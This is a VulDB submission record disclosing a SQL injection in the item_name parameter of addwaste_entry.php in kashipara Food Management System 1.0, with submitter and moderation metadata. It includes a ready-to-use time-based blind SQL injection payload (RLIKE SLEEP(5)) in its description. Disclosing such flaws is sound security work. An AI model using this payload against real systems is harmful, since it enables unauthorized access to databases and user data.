Submit #261889: kashipara Food Management System ≤1.0 SQL injectioninfo

Titelkashipara Food Management System ≤1.0 SQL injection
BeschreibungSQL injection vulnerability exists in item_name parameter of addwaste_entry.php file of Food Management System Important user data or system data may be leaked and system security may be compromised The environment is secure and the information can be used by malicious users. Payload: chk_in_date=01/01/1967&entry_date=03-01-2024&item_name=pHqghUme&item_name[]=pHqghUme' RLIKE SLEEP(5) AND 'WvSf'='WvSf&item_type=3&itemnumber[]=0&itemype[]=5&quantity=1&submit=Save&waste=1
Quelle⚠️ https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%203.pdf
Benutzer
 SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936)
Einreichung03.01.2024 11:09 (vor 2 Jahren)
Moderieren06.01.2024 11:15 (3 days later)
StatusAkzeptiert
VulDB Eintrag249828 [Kashipara Food Management System bis 1.0 addwaste_entry.php item_name SQL Injection]
Punkte20

Do you want to use VulDB in your project?

Use the official API to access entries easily!